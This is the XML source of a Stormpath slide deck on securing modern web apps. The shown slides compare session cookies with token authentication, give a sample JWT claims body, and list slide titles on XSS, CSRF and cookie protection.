    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969690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315200" cy="609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Securing User Credentials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6911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Bonus Round!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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>iss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>": "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>api.stormpath.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/v1/applications/1h72PFWoGxHKhysKjYIkir",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"sub": "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>api.stormpath.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/v1/accounts/25texzRz3g0vNKlSWNGPXq",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>jti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>": "6b577bde-80dd-4468-904a-0c34f4bfdb17",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>iat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>": 1431497733,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 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>": 1431501333,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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xsrfToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>47255bff-6766-4445-8645-55189427e13d"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}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5486400"/>
            <a:ext cx="185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 Stateless!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53000" y="48768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8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Recap..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Session Identifiers are problematic because they’re opaque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access Tokens are better because they’re structured and contain identity assertions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OK for token storage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>but you MUST secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>them the right 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0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Use Stormpath for API Authentication &amp; Security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In addition to user authentication and data security, Stormpath can handle authentication and authorization for your API, SPA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>or mobile app.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API Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>API Key Management</a:t>
            </a:r>
          </a:p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Token Based Authentication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 smtClean="0"/>
              <a:t>JWTs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://docs.stormpath.com/guides/api-key-management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Implementations in your Library </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of choice: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://docs.stormpath.com/home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16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Get started with your free Stormpath </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>developer account!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https://api.stormpath.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>register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Questions?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support@stormpath.com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Securing User Credentials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Traditionally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>we accept username &amp; password, then store a Session ID in a cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99808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2" y="1048786"/>
            <a:ext cx="8352788" cy="5181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Securing User Credentials: Session ID Cookie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2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Securing User Credentials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OK if you protect your cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However it may not scale well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doesn’t let the client know what can be accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Access Tokens are better</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>!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(We</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> get there later)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29475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tasoft_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katasoft_new</Template>
  <TotalTime>53036</TotalTime>
  <Words>1890</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>319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katasoft_new</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>About Stormpath</vt:lpstr>
      <vt:lpstr>Talk Overview</vt:lpstr>
      <vt:lpstr>Modern Web Applications</vt:lpstr>
      <vt:lpstr>Security Concerns for Modern Web Apps</vt:lpstr>
      <vt:lpstr>Securing User Credentials</vt:lpstr>
      <vt:lpstr>Securing User Credentials</vt:lpstr>
      <vt:lpstr>Securing User Credentials: Session ID Cookie</vt:lpstr>
      <vt:lpstr>Securing User Credentials</vt:lpstr>
      <vt:lpstr>Securing API Endpoints</vt:lpstr>
      <vt:lpstr>Securing Server (API) Endpoints</vt:lpstr>
      <vt:lpstr>Informing the Client about Access Control</vt:lpstr>
      <vt:lpstr>Providing Access Control Rules to the Client</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cookies, The Right Way ®</vt:lpstr>
      <vt:lpstr>Man In The Middle (MITM) Attacks</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>XSS Attacks</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>XSS Attack Demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>XSS Attack – What Can I Do?</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery  (CSRF) (XSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Double Submit Cookie</vt:lpstr>
      <vt:lpstr>Double Submit Cookie Workflow</vt:lpstr>
      <vt:lpstr>Double Submit Cookie Workflow</vt:lpstr>
      <vt:lpstr>Double Submit Cookie Considerations</vt:lpstr>
      <vt:lpstr>Double Submit Cookie Considerations</vt:lpstr>
      <vt:lpstr>Origin Header check</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Session ID Problems</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Token Authentication</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Token Authentication Workflow</vt:lpstr>
      <vt:lpstr>Token Authentication Workflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>JSON Web Tokens (JWT)</vt:lpstr>
      <vt:lpstr>Demo!</vt:lpstr>
      <vt:lpstr>Angular App w/ Login Form</vt:lpstr>
      <vt:lpstr>Login makes POST to /oauth/token</vt:lpstr>
      <vt:lpstr>Server Response</vt:lpstr>
      <vt:lpstr>Subsequent Requests</vt:lpstr>
      <vt:lpstr>Bonus Round!</vt:lpstr>
      <vt:lpstr>Recap..</vt:lpstr>
      <vt:lpstr>Use Stormpath for API Authentication &amp; Security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IBM_USER</dc:creator>
  <cp:lastModifiedBy>Kelsey</cp:lastModifiedBy>
  <cp:revision>616</cp:revision>
  <cp:lastPrinted>2010-09-16T15:59:12Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-08-27T22:29:47Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-14T20:51:44Z</dcterms:modified>
</cp:coreProperties>
</file>